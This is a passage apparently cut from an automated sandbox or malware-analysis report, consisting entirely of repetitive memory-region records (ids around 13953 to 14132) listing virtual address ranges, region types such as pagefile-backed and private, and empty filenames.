1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13964 start_va = 0x10770000 end_va = 0x107effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010770000" filename = "" Region: id = 13965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13970 start_va = 0x610000 end_va = 0x616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13971 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13972 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 13973 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13976 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13977 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 13978 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13979 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13980 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13981 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13982 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13983 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13984 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13985 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13986 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13987 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13988 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13989 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13990 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13991 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13992 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13993 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13994 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13995 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13996 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13997 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13998 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 13999 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14000 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14001 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14010 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14011 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14013 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14014 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14015 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14016 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14017 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14018 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14019 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14020 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14021 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14022 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14023 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14024 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14025 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14026 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14027 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14030 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14031 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14032 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14033 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14034 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14035 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14036 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14037 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14038 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14040 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14041 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14043 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14044 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14045 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14046 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14058 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14059 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14060 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14061 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14062 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14063 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14064 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14065 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14066 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14067 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14068 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14069 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14070 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14071 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14072 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14073 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14074 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14076 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14077 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14078 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14079 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14080 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14081 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14082 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14083 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14084 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14085 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14086 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14087 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14088 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14089 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14090 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14091 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14092 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14093 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14096 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14097 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14098 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14099 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14100 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14101 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14102 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14103 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14104 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14105 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14106 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14107 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14108 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14109 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14110 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14111 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14112 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14113 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14114 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14115 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14116 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14117 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14118 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14119 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14120 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14121 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14122 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14123 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14124 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14125 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14126 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14127 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14128 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14129 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14130 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14131 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14132 start_va = 0x1e80000 end_va = 0x1e8efff monitored 